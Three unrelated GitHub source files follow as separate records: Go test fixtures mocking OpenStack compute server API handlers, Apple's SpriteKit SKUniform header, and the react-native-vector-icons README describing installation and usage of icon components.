"name": "default",
},
},
}
// ServerDerp is a Server struct that should correspond to the second server in ServerListBody.
ServerDerp = Server{
Status: "ACTIVE",
Updated: "2014-09-25T13:04:49Z",
HostID: "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
Addresses: map[string]interface{}{
"private": []interface{}{
map[string]interface{}{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:9e:89:be",
"version": float64(4),
"addr": "10.0.0.31",
"OS-EXT-IPS:type": "fixed",
},
},
},
Links: []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "self",
},
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "bookmark",
},
},
Image: map[string]interface{}{
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark",
},
},
},
Flavor: map[string]interface{}{
"id": "1",
"links": []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark",
},
},
},
ID: "9e5476bd-a4ec-4653-93d6-72c93aa682ba",
UserID: "9349aff8be7545ac9d2f1d00999a23cd",
Name: "derp",
Created: "2014-09-25T13:04:41Z",
TenantID: "fcad67a6189847c4aecfa3c81a05783b",
Metadata: map[string]interface{}{},
SecurityGroups: []map[string]interface{}{
map[string]interface{}{
"name": "default",
},
},
}
)
// HandleServerCreationSuccessfully sets up the test server to respond to a server creation request
// with a given response.
func HandleServerCreationSuccessfully(t *testing.T, response string) {
th.Mux.HandleFunc("/servers", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{
"server": {
"name": "derp",
"imageRef": "f90f6034-2570-4974-8351-6b49732ef2eb",
"flavorRef": "1"
}
}`)
w.WriteHeader(http.StatusAccepted)
w.Header().Add("Content-Type", "application/json")
fmt.Fprintf(w, response)
})
}
// HandleServerListSuccessfully sets up the test server to respond to a server List request.
func HandleServerListSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/detail", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.Header().Add("Content-Type", "application/json")
r.ParseForm()
marker := r.Form.Get("marker")
switch marker {
case "":
fmt.Fprintf(w, ServerListBody)
case "9e5476bd-a4ec-4653-93d6-72c93aa682ba":
fmt.Fprintf(w, `{ "servers": [] }`)
default:
t.Fatalf("/servers/detail invoked with unexpected marker=[%s]", marker)
}
})
}
// HandleServerDeletionSuccessfully sets up the test server to respond to a server deletion request.
func HandleServerDeletionSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/asdfasdfasdf", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "DELETE")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.WriteHeader(http.StatusNoContent)
})
}
// HandleServerGetSuccessfully sets up the test server to respond to a server Get request.
func HandleServerGetSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestHeader(t, r, "Accept", "application/json")
fmt.Fprintf(w, SingleServerBody)
})
}
// HandleServerUpdateSuccessfully sets up the test server to respond to a server Update request.
func HandleServerUpdateSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "PUT")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestHeader(t, r, "Accept", "application/json")
th.TestHeader(t, r, "Content-Type", "application/json")
th.TestJSONRequest(t, r, `{ "server": { "name": "new-name" } }`)
fmt.Fprintf(w, SingleServerBody)
})
}
// HandleAdminPasswordChangeSuccessfully sets up the test server to respond to a server password
// change request.
func HandleAdminPasswordChangeSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/action", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{ "changePassword": { "adminPass": "new-password" } }`)
w.WriteHeader(http.StatusAccepted)
})
}
// HandleRebootSuccessfully sets up the test server to respond to a reboot request with success.
func HandleRebootSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/action", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{ "reboot": { "type": "SOFT" } }`)
w.WriteHeader(http.StatusAccepted)
})
}
// HandleRebuildSuccessfully sets up the test server to respond to a rebuild request with success.
func HandleRebuildSuccessfully(t *testing.T, response string) {
th.Mux.HandleFunc("/servers/1234asdf/action", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `
{
"rebuild": {
"name": "new-name",
"adminPass": "swordfish",
"imageRef": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"accessIPv4": "1.2.3.4"
}
}
`)
w.WriteHeader(http.StatusAccepted)
w.Header().Add("Content-Type", "application/json")
fmt.Fprintf(w, response)
})
}
// HandleServerRescueSuccessfully sets up the test server to respond to a server Rescue request.
func HandleServerRescueSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/action", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{ "rescue": { "adminPass": "1234567890" } }`)
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{ "adminPass": "1234567890" }`))
})
}
// HandleMetadatumGetSuccessfully sets up the test server to respond to a metadatum Get request.
func HandleMetadatumGetSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata/foo", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestHeader(t, r, "Accept", "application/json")
w.WriteHeader(http.StatusOK)
w.Header().Add("Content-Type", "application/json")
w.Write([]byte(`{ "meta": {"foo":"bar"}}`))
})
}
// HandleMetadatumCreateSuccessfully sets up the test server to respond to a metadatum Create request.
func HandleMetadatumCreateSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata/foo", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "PUT")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{
"meta": {
"foo": "bar"
}
}`)
w.WriteHeader(http.StatusOK)
w.Header().Add("Content-Type", "application/json")
w.Write([]byte(`{ "meta": {"foo":"bar"}}`))
})
}
// HandleMetadatumDeleteSuccessfully sets up the test server to respond to a metadatum Delete request.
func HandleMetadatumDeleteSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata/foo", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "DELETE")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.WriteHeader(http.StatusNoContent)
})
}
// HandleMetadataGetSuccessfully sets up the test server to respond to a metadata Get request.
func HandleMetadataGetSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestHeader(t, r, "Accept", "application/json")
w.WriteHeader(http.StatusOK)
w.Write([]byte(`{ "metadata": {"foo":"bar", "this":"that"}}`))
})
}
// HandleMetadataResetSuccessfully sets up the test server to respond to a metadata Create request.
func HandleMetadataResetSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "PUT")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{
"metadata": {
"foo": "bar",
"this": "that"
}
}`)
w.WriteHeader(http.StatusOK)
w.Header().Add("Content-Type", "application/json")
w.Write([]byte(`{ "metadata": {"foo":"bar", "this":"that"}}`))
})
}
// HandleMetadataUpdateSuccessfully sets up the test server to respond to a metadata Update request.
func HandleMetadataUpdateSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/1234asdf/metadata", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "POST")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
th.TestJSONRequest(t, r, `{
"metadata": {
"foo": "baz",
"this": "those"
}
}`)
w.WriteHeader(http.StatusOK)
w.Header().Add("Content-Type", "application/json")
w.Write([]byte(`{ "metadata": {"foo":"baz", "this":"those"}}`))
})
}
// ListAddressesExpected represents an expected repsonse from a ListAddresses request.
var ListAddressesExpected = map[string][]Address{
"public": []Address{
Address{
Version: 4,
Address: "80.56.136.39",
},
Address{
Version: 6,
Address: "2001:4800:790e:510:be76:4eff:fe04:82a8",
},
},
"private": []Address{
Address{
Version: 4,
Address: "10.880.3.154",
},
},
}
// HandleAddressListSuccessfully sets up the test server to respond to a ListAddresses request.
func HandleAddressListSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/asdfasdfasdf/ips", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.Header().Add("Content-Type", "application/json")
fmt.Fprintf(w, `{
"addresses": {
"public": [
{
"version": 4,
"addr": "50.56.176.35"
},
{
"version": 6,
"addr": "2001:4800:780e:510:be76:4eff:fe04:84a8"
}
],
"private": [
{
"version": 4,
"addr": "10.180.3.155"
}
]
}
}`)
})
}
// ListNetworkAddressesExpected represents an expected repsonse from a ListAddressesByNetwork request.
var ListNetworkAddressesExpected = []Address{
Address{
Version: 4,
Address: "50.56.176.35",
},
Address{
Version: 6,
Address: "2001:4800:780e:510:be76:4eff:fe04:84a8",
},
}
// HandleNetworkAddressListSuccessfully sets up the test server to respond to a ListAddressesByNetwork request.
func HandleNetworkAddressListSuccessfully(t *testing.T) {
th.Mux.HandleFunc("/servers/asdfasdfasdf/ips/public", func(w http.ResponseWriter, r *http.Request) {
th.TestMethod(t, r, "GET")
th.TestHeader(t, r, "X-Auth-Token", client.TokenID)
w.Header().Add("Content-Type", "application/json")
fmt.Fprintf(w, `{
"public": [
{
"version": 4,
"addr": "50.56.176.35"
},
{
"version": 6,
"addr": "2001:4800:780e:510:be76:4eff:fe04:84a8"
}
]
}`)
})
}
| {
"pile_set_name": "Github"
} |
/**
@header
Uniform defines the type and data associated with a custom fragment shader, SKShader.
@copyright 2013 Apple, Inc. All rights reserved.
*/
#import <SpriteKit/SpriteKitBase.h>
#import <SpriteKit/SKTexture.h>
#import <GLKit/GLKMath.h>
typedef NS_ENUM(NSInteger, SKUniformType) {
SKUniformTypeNone = 0,
SKUniformTypeFloat = 1,
SKUniformTypeFloatVector2 = 2,
SKUniformTypeFloatVector3 = 3,
SKUniformTypeFloatVector4 = 4,
SKUniformTypeFloatMatrix2 = 5,
SKUniformTypeFloatMatrix3 = 6,
SKUniformTypeFloatMatrix4 = 7,
SKUniformTypeTexture = 8,
} NS_ENUM_AVAILABLE(10_10, 8_0);
NS_ASSUME_NONNULL_BEGIN
NS_CLASS_AVAILABLE(10_10, 8_0)
SK_EXPORT @interface SKUniform : NSObject <NSCopying, NSCoding>
/**
Create a shader uniform with a given name.
@param name the name of the shader uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name;
/**
Create a shader uniform with a given name, and texture data
@param name the name of the shader uniform.
@param texture the texture data associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name texture:(SKTexture*)texture;
/**
Create a shader uniform with a given name, and a float value
@param name the name of the shader uniform.
@param value the floating point value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name float:(float)value;
/**
Create a shader uniform with a given name, and a float vector2 value
@param name the name of the shader uniform.
@param value the float vector2 value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatVector2:(GLKVector2)value;
/**
Create a shader uniform with a given name, and a float vector3 value
@param name the name of the shader uniform.
@param value the float vector3 value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatVector3:(GLKVector3)value;
/**
Create a shader uniform with a given name, and a float vector4 value
@param name the name of the shader uniform.
@param value the float vector4 value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatVector4:(GLKVector4)value;
/**
Create a shader uniform with a given name, and a 2x2 matrix value
@param name the name of the shader uniform.
@param value the 2x2 matrix value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatMatrix2:(GLKMatrix2)value;
/**
Create a shader uniform with a given name, and a 3x3 matrix value
@param name the name of the shader uniform.
@param value the 3x3 matrix value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatMatrix3:(GLKMatrix3)value;
/**
Create a shader uniform with a given name, and a 4x4 matrix value
@param name the name of the shader uniform.
@param value the 4x4 matrix value associated with this uniform.
*/
+ (instancetype)uniformWithName:(NSString *)name floatMatrix4:(GLKMatrix4)value;
/* The name by which this uniform will be referenced in a shader */
@property (nonatomic, readonly) NSString *name;
/* Once created, a uniform is locked to a specific type, you may only access the property of this type */
@property (nonatomic, readonly) SKUniformType uniformType;
/* Access to the texture data associated with the current uniform */
@property (nonatomic, retain, nullable) SKTexture *textureValue;
/* Access to the float value associated with the current uniform */
@property float floatValue;
/* Access to the float vector 2 value associated with the current uniform */
@property GLKVector2 floatVector2Value;
/* Access to the float vector 3 value associated with the current uniform */
@property GLKVector3 floatVector3Value;
/* Access to the float vector 4 value associated with the current uniform */
@property GLKVector4 floatVector4Value;
/* Access to the 2x2 matrix value associated with the current uniform */
@property GLKMatrix2 floatMatrix2Value;
/* Access to the 3x3 matrix value associated with the current uniform */
@property GLKMatrix3 floatMatrix3Value;
/* Access to the 4x4 matrix value associated with the current uniform */
@property GLKMatrix4 floatMatrix4Value;
- (instancetype)initWithName:(NSString *)name;
- (instancetype)initWithName:(NSString *)name texture:(nullable SKTexture*)texture;
- (instancetype)initWithName:(NSString *)name float:(float)value;
- (instancetype)initWithName:(NSString *)name floatVector2:(GLKVector2)value;
- (instancetype)initWithName:(NSString *)name floatVector3:(GLKVector3)value;
- (instancetype)initWithName:(NSString *)name floatVector4:(GLKVector4)value;
- (instancetype)initWithName:(NSString *)name floatMatrix2:(GLKMatrix2)value;
- (instancetype)initWithName:(NSString *)name floatMatrix3:(GLKMatrix3)value;
- (instancetype)initWithName:(NSString *)name floatMatrix4:(GLKMatrix4)value;
@end
NS_ASSUME_NONNULL_END
| {
"pile_set_name": "Github"
} |

[](https://travis-ci.org/oblador/react-native-vector-icons) [](https://npmjs.com/package/react-native-vector-icons) [](https://npmjs.com/package/react-native-vector-icons)
Perfect for buttons, logos and nav/tab bars. Easy to extend, style and integrate into your project.
## Table of Contents
- [Bundled Icon Sets](#bundled-icon-sets)
- [Installation](#installation)
- [iOS](#ios)
- [Android](#android)
- [OSX](#osx-via-react-native-desktop)
- [Windows](#windows-via-react-native-windows)
- [Web](#web-with-webpack)
- [Upgrading](#upgrading)
- [Icon Component](#icon-component)
- [Icon.Button Component](#iconbutton-component)
- [Usage as PNG image/source object](#usage-as-png-imagesource-object)
- [Usage with TabBarIOS](#usage-with-tabbarios)
- [Multi-style fonts](#multi-style-fonts)
- [Custom Fonts](#custom-fonts)
- [Animation](#animation)
- [Examples](#examples)
- [Generating your own icon set from a CSS file](#generating-your-own-icon-set-from-a-css-file)
- [Changelog](#changelog)
- [Troubleshooting](#troubleshooting)
- [License](#license)
## Sponsoring
If you find the library useful, please consider [sponsoring](https://github.com/sponsors/oblador). Things I have planned is to split up the repo into a monorepo, that would enable individual versioning of icon sets, better performance, smaller bundle and easier for the community to publish their own.
## Bundled Icon Sets
[Browse all](https://oblador.github.io/react-native-vector-icons/).
- [`AntDesign`](https://ant.design/) by AntFinance (**297** icons)
- [`Entypo`](http://entypo.com) by Daniel Bruce (**411** icons)
- [`EvilIcons`](http://evil-icons.io) by Alexander Madyankin & Roman Shamin (v1.10.1, **70** icons)
- [`Feather`](http://feathericons.com) by Cole Bemis & Contributors (v4.28.0, **285** icons)
- [`FontAwesome`](http://fortawesome.github.io/Font-Awesome/icons/) by Dave Gandy (v4.7.0, **675** icons)
- [`FontAwesome 5`](https://fontawesome.com) by Fonticons, Inc. (v5.13.0, 1588 (free) **7842** (pro) icons)
- [`Fontisto`](https://github.com/kenangundogan/fontisto) by Kenan Gündoğan (v3.0.4, **615** icons)
- [`Foundation`](http://zurb.com/playground/foundation-icon-fonts-3) by ZURB, Inc. (v3.0, **283** icons)
- [`Ionicons`](https://ionicons.com/) by Iconic Framework (v5.0.1, **1227** icons)
- [`MaterialIcons`](https://www.google.com/design/icons/) by Google, Inc. (v4.0.0, **1547** icons)
- [`MaterialCommunityIcons`](https://materialdesignicons.com/) by MaterialDesignIcons.com (v5.3.45, **5346** icons)
- [`Octicons`](http://octicons.github.com) by Github, Inc. (v8.4.1, **184** icons)
- [`Zocial`](http://zocial.smcllns.com/) by Sam Collins (v1.0, **100** icons)
- [`SimpleLineIcons`](https://simplelineicons.github.io/) by Sabbir & Contributors (v2.4.1, **189** icons)
## Installation
1. Run: `$ npm install --save react-native-vector-icons`
2. For each platform (iOS/Android/Windows) you plan to use, follow one of the options for the corresponding platform.
3. If you intend to use FontAwesome 5, check out [`this guide`](FONTAWESOME5.md) to get you started.
### iOS
#### Option: Manually
If you want to use any of the bundled icons, you need to add the icon fonts to your Xcode project. Just follow these steps:
- Browse to `node_modules/react-native-vector-icons` and drag the folder `Fonts` (or just the ones you want) to your project in Xcode. **Make sure your app is checked under "Add to targets" and that "Create groups" is checked if you add the whole folder**. Not familiar with Xcode? Try [this article](https://medium.com/@vimniky/how-to-use-vector-icons-in-your-react-native-project-8212ac6a8f06)
- Edit `Info.plist` and add a property called **Fonts provided by application** (or `UIAppFonts` if Xcode won't autocomplete/not using Xcode) and type in the files you just added. It will look something like this:

<details><summary>List of all available fonts to copy & paste in info.plist</summary>
```xml
<key>UIAppFonts</key>
<array>
<string>AntDesign.ttf</string>
<string>Entypo.ttf</string>
<string>EvilIcons.ttf</string>
<string>Feather.ttf</string>
<string>FontAwesome.ttf</string>
<string>FontAwesome5_Brands.ttf</string>
<string>FontAwesome5_Regular.ttf</string>
<string>FontAwesome5_Solid.ttf</string>
<string>Foundation.ttf</string>
<string>Ionicons.ttf</string>
<string>MaterialIcons.ttf</string>
<string>MaterialCommunityIcons.ttf</string>
<string>SimpleLineIcons.ttf</string>
<string>Octicons.ttf</string>
<string>Zocial.ttf</string>
<string>Fontisto.ttf</string>
</array>
```
</details>
<br>
_Note: you need to recompile your project after adding new fonts, also ensure that they also appear under **Copy Bundle Resources** in **Build Phases**._
If you want to use the TabBar/NavigatorIOS integration or use `getImageSource`/`getImageSourceSync`, then you need to add `RNVectorIcons.xcodeproj` to **Libraries** and add `libRNVectorIcons.a` to **Link Binary With Libraries** under **Build Phases**. [More info and screenshots about how to do this is available in the React Native documentation](https://reactnative.dev/docs/linking-libraries-ios.html#content).
#### Option: With `react-native link`
`$ react-native link react-native-vector-icons`
_Note: Some users are having trouble using this method, try one of the others if you are too._
#### Option: With [CocoaPods](https://cocoapods.org/)
Add the following to your `Podfile` and run `pod update`:
```
pod 'RNVectorIcons', :path => '../node_modules/react-native-vector-icons'
```
Edit `Info.plist` as described above.
If you are using `use_frameworks!` in your `Podfile` you instead need to dynamically load the icon font by doing `Icon.loadFont()` when boostrapping your application.
_Note: You must be consuming React itself via CocoaPods for this to work, see [React Native documentation](https://reactnative.dev/docs/integration-with-existing-apps) on how to set that up._
### Android
#### Option: With Gradle (recommended)
This method has the advantage of fonts being copied from this module at build time so that the fonts and JS are always in sync, making upgrades painless.
Edit `android/app/build.gradle` ( NOT `android/build.gradle` ) and add the following:
```gradle
apply from: "../../node_modules/react-native-vector-icons/fonts.gradle"
```
To customize the files being copied, add the following instead:
```gradle
project.ext.vectoricons = [
iconFontNames: [ 'MaterialIcons.ttf', 'EvilIcons.ttf' ] // Name of the font files you want to copy
]
apply from: "../../node_modules/react-native-vector-icons/fonts.gradle"
```
#### Option: Manually
- Copy the contents in the `Fonts` folder to `android/app/src/main/assets/fonts` (_note lowercase fonts folder_).
##### Integrating library for `getImageSource` support
These steps are optional and only needed if you want to use the `Icon.getImageSource` function.
- Edit `android/settings.gradle` to look like this (without the +):
```diff
rootProject.name = 'MyApp'
include ':app'
+ include ':react-native-vector-icons'
+ project(':react-native-vector-icons').projectDir = new File(rootProject.projectDir, '../node_modules/react-native-vector-icons/android')
```
- Edit `android/app/build.gradle` (note: **app** folder) to look like this:
```diff
apply plugin: 'com.android.application'
android {
...
}
dependencies {
compile fileTree(dir: 'libs', include: ['*.jar'])
compile "com.android.support:appcompat-v7:23.0.1"
compile "com.facebook.react:react-native:+" // From node_modules
+ compile project(':react-native-vector-icons')
}
```
- Edit your `MainApplication.java` (deep in `android/app/src/main/java/...`) to look like this (note **two** places to edit):
```diff
package com.myapp;
+ import com.oblador.vectoricons.VectorIconsPackage;
....
@Override
protected List<ReactPackage> getPackages() {
return Arrays.<ReactPackage>asList(
new MainReactPackage()
+ , new VectorIconsPackage()
);
}
}
```
### OSX via [`react-native-desktop`](https://github.com/ptmt/react-native-desktop)
- Browse to `node_modules/react-native-vector-icons` and drag the folder `Fonts` to your project in Xcode. **Make sure your app is checked under "Add to targets" and that "Create folder references" is checked**.
- Edit `Info.plist` and add a property called **Application fonts resource path** (or `ATSApplicationFontsPath` if Xcode won't autocomplete/not using Xcode) and type `Fonts` as the value.
_Note: you need to recompile your project after adding new fonts, also ensure that the `Fonts` folder also appear under **Copy Bundle Resources** in **Build Phases**._
### Windows via [`react-native-windows`](https://github.com/ReactWindows/react-native-windows)
- Open your solution in Visual Studio, right click the Assets folder in your solution, click **Add Existing**.
- Browse to the `node_modules\react-native-vector-icons\Fonts` folder, select the required font files
- Click the **Add** drop-down and select **Add as Link**.
- Set **Copy To Output Directory** property of each font file to **Copy if newer**
_Note: you need to recompile your project after adding new fonts._
### Web (with [webpack](https://webpack.js.org/))
In your webpack configuration file, add a section to handle ttf files using url-loader (or file-loader)
```js
{
test: /\.ttf$/,
loader: "url-loader", // or directly file-loader
include: path.resolve(__dirname, "node_modules/react-native-vector-icons"),
},
```
Then consume those files in your JavaScript entry point to get the bundled url and inject a style tag in your page:
```js
// Use prebuilt version of RNVI in dist folder
import Icon from 'react-native-vector-icons/dist/FontAwesome';
// Generate required css
import iconFont from 'react-native-vector-icons/Fonts/FontAwesome.ttf';
const iconFontStyles = `@font-face {
src: url(${iconFont});
font-family: FontAwesome;
}`;
// Create stylesheet
const style = document.createElement('style');
style.type = 'text/css';
if (style.styleSheet) {
style.styleSheet.cssText = iconFontStyles;
} else {
style.appendChild(document.createTextNode(iconFontStyles));
}
// Inject stylesheet
document.head.appendChild(style);
```
## Upgrading
Upgrading this package often requires the font files linked to your projects to be updated as well. If the automatic linking works for you, running this again should update the fonts. Otherwise you need to follow the steps outlined in the [installation](#installation) section.
## `Icon` Component
You can either use one of the bundled icons above or roll your own custom font.
```js
import Icon from 'react-native-vector-icons/FontAwesome';
const myIcon = <Icon name="rocket" size={30} color="#900" />;
```
### Properties
Any [Text property](https://reactnative.dev/docs/text.html) and the following:
| Prop | Description | Default |
| ----------- | ----------------------------------------------------------------------- | ----------- |
| **`size`** | Size of the icon, can also be passed as `fontSize` in the style object. | `12` |
| **`name`** | What icon to show, see Icon Explorer app or one of the links above. | _None_ |
| **`color`** | Color of the icon. | _Inherited_ |
### Static Methods
| Prop | Description |
| ------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **`getFontFamily`** | Returns the font family that is currently used to retrieve icons as text. Usage: `const fontFamily = Icon.getFontFamily()` |
| **`getImageSource`** | Returns a promise that resolving to the source of a bitmap version of the icon for use with `Image` component et al. Usage: `const source = await Icon.getImageSource(name, size, color)` |
| **`getImageSourceSync`** | Same as `getImageSource` but synchronous. Usage: `const source = Icon.getImageSourceSync(name, size, color)` |
| **`getRawGlyphMap`** | Returns the raw glyph map of the icon set. Usage: `const glyphMap = Icon.getRawGlyphMap()` |
| **`hasIcon`** | Checks if the name is valid in current icon set. Usage: `const isNameValid = Icon.hasIcon(name)` |
### Styling
Since `Icon` builds on top of the `Text` component, most [style properties](https://reactnative.dev/docs/style.html) will work as expected, you might find it useful to play around with these:
- `backgroundColor`
- `borderWidth`
- `borderColor`
- `borderRadius`
- `padding`
- `margin`
- `color`
- `fontSize`
NOTE: On android `Text` doesn't currently support `border*` styles, to circumvent this simply wrap your `Icon` with a `View`.
By combining some of these you can create for example :


## `Icon.Button` Component
A convenience component for creating buttons with an icon on the left side.
```js
import Icon from 'react-native-vector-icons/FontAwesome';
const myButton = (
<Icon.Button
name="facebook"
backgroundColor="#3b5998"
onPress={this.loginWithFacebook}
>
Login with Facebook
</Icon.Button>
);
const customTextButton = (
<Icon.Button name="facebook" backgroundColor="#3b5998">
<Text style={{ fontFamily: 'Arial', fontSize: 15 }}>
Login with Facebook
</Text>
</Icon.Button>
);
```

### Properties
Any [`Text`](https://reactnative.dev/docs/text.html), [`TouchableHighlight`](https://reactnative.dev/docs/touchablehighlight.html) or [`TouchableWithoutFeedback`](https://reactnative.dev/docs/touchablewithoutfeedback.html) property in addition to these:
| Prop | Description | Default |
| --------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------- |
| **`color`** | Text and icon color, use `iconStyle` or nest a `Text` component if you need different colors. | `white` |
| **`size`** | Icon size. | `20` |
| **`iconStyle`** | Styles applied to the icon only, good for setting margins or a different color. _Note: use `iconStyle` for margins or expect unstable behaviour._ | `{marginRight: 10}` |
| **`backgroundColor`** | Background color of the button. | `#007AFF` |
| **`borderRadius`** | Border radius of the button, set to `0` to disable. | `5` |
| **`onPress`** | A function called when the button is pressed. | _None_ |
## Usage as PNG image/source object
Convenient way to plug this in into other components that rely on bitmap images rather than scalable vector icons. Takes the arguments `name`, `size` and `color` as described above.
```js
Icon.getImageSource('user', 20, 'red').then(source =>
this.setState({ userIcon: source })
);
```
Alternatively you may use the synchronous method `Icon.getImageSourceSync` to avoid rendering glitches. Keep in mind that this method is blocking and might incur performance penalties. Subsequent calls will use cache however.
For a complete example check out the `TabBarExample` project.
## Usage with [TabBarIOS](https://reactnative.dev/docs/tabbarios.html)
Simply use `Icon.TabBarItemIOS` instead of `TabBarIOS.Item`. This is an extended component that works exactly the same but with three additional properties:
| Prop | Description | Default |
| ----------------------- | ----------------------------------------------------------------------- | ------------- |
| **`iconName`** | Name of the default icon (similar to `TabBarIOS.Item` `icon`) | _None_ |
| **`selectedIconName`** | Name of the selected icon (similar to `TabBarIOS.Item` `selectedIcon`). | _`iconName`_ |
| **`iconSize`** | Size of the icon. | `30` |
| **`iconColor`** | Color of the icon. | _None_ |
| **`selectedIconColor`** | Color of the selected icon. | _`iconColor`_ |
For example usage see `Examples/TabBarExample` or the examples section below. Don't forget to import and link to this project as described above if you are going to use the TabBar integration.
**Note:** using `iconColor` and `selectedIconColor` requires the attribute [renderAsOriginal](https://reactnative.dev/docs/tabbarios-item.html#renderasoriginal) to be set to `true` on `Icon.TabBarItemIOS`.
# Multi-style fonts
Some fonts today use multiple styles, FontAwesome 5 for example, which is supported by this library. The usage is pretty much the same as the standard `Icon` component:
```jsx
import Icon from 'react-native-vector-icons/FontAwesome5';
const myIcon1 = <Icon name="comments" size={30} color="#900" />; // Defaults to regular
const myIcon2 = <Icon name="comments" size={30} color="#900" solid />;
const myIcon3 = <Icon name="comments" size={30} color="#900" light />; // Only in FA5 Pro
```
### Static methods
All static methods from `Icon` is supported by multi-styled fonts.
| Prop | Description |
| ------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **`getFontFamily`** | Returns the font family that is currently used to retrieve icons as text. Usage: `const fontFamily = Icon.getFontFamily(style)` |
| **`getImageSource`** | Returns a promise that resolving to the source of a bitmap version of the icon for use with `Image` component et al. Usage: `const source = await Icon.getImageSource(name, size, color)` |
| **`getImageSourceSync`** | Same as `getImageSource` but synchronous. Usage: `const source = Icon.getImageSourceSync(name, size, color)` |
| **`getRawGlyphMap`** | Returns the raw glyph map of the icon set. Usage: `const glyphMap = Icon.getRawGlyphMap(style)` |
| **`hasIcon`** | Checks if the name is valid in current icon set. Usage: `const isNameValid = Icon.hasIcon(name, style)` |
| **`getStyledIconSet`** | Use this to get a `Icon` component for a single style. Usage. `const StyledIcon = Icon.getStyledIconSet(style)` |
If no style argument is passed (or if it's invalid) the methods will default to a pre-defineds fallback.
### Components
`Icon.Button`, `Icon.TabBarItem`, `Icon.TabBarItemIOS` are all supported, usage is just like `Icon`:
```jsx
import Icon from 'react-native-vector-icons/FontAwesome5';
const myButton = (
<Icon.Button name="facebook" onPress={this.loginWithFacebook} solid>
Login with Facebook
</Icon.Button>
);
```
## Custom Fonts
### `createIconSet(glyphMap, fontFamily[, fontFile])`
